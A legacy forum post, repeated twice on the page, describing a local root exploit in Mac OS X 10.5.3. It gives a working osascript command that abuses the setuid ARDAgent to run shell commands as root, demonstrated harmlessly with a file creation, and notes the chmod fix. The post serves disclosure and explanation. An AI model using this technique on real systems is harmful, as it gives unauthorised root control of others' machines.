Local root exploit for 10.5.3...
What a way to start this forum. This exploit is starting to hit the news sites.
As a non-privileged user you can do this kind of thing exploiting the remote desktop agent:
osascript -e 'tell app "ARDAgent" to do shell script "touch /bin/foobar"'
And then "ls -l /bin/foobar" you can see that you've written to /bin and created a file owned by root. Try:
rm /bin/foobar
and it'll fail: you need to use sudo. Turns out that the ARDAgent (/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ardagent) has the setuid bit set, where it shouldn't be. So the fix is trivial, just a chmod away.
This is a local exploit and needs physical access. So you know, they could just copy all your files to a USB stick and walk off.
Not every day we see an exploit for the Mac. OK, on to more productive posts!
As a non-privileged user you can do this kind of thing exploiting the remote desktop agent:
osascript -e 'tell app "ARDAgent" to do shell script "touch /bin/foobar"'
And then "ls -l /bin/foobar" you can see that you've written to /bin and created a file owned by root. Try:
rm /bin/foobar
and it'll fail: you need to use sudo. Turns out that the ARDAgent (/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ardagent) has the setuid bit set, where it shouldn't be. So the fix is trivial, just a chmod away.
This is a local exploit and needs physical access. So you know, they could just copy all your files to a USB stick and walk off.
Not every day we see an exploit for the Mac. OK, on to more productive posts!
0 Comments
[ + ] Show comments
Answers (0)
Please log in to answer
Be the first to answer this question
Rating comments in this legacy AppDeploy message board thread won't reorder them,so that the conversation will remain readable.
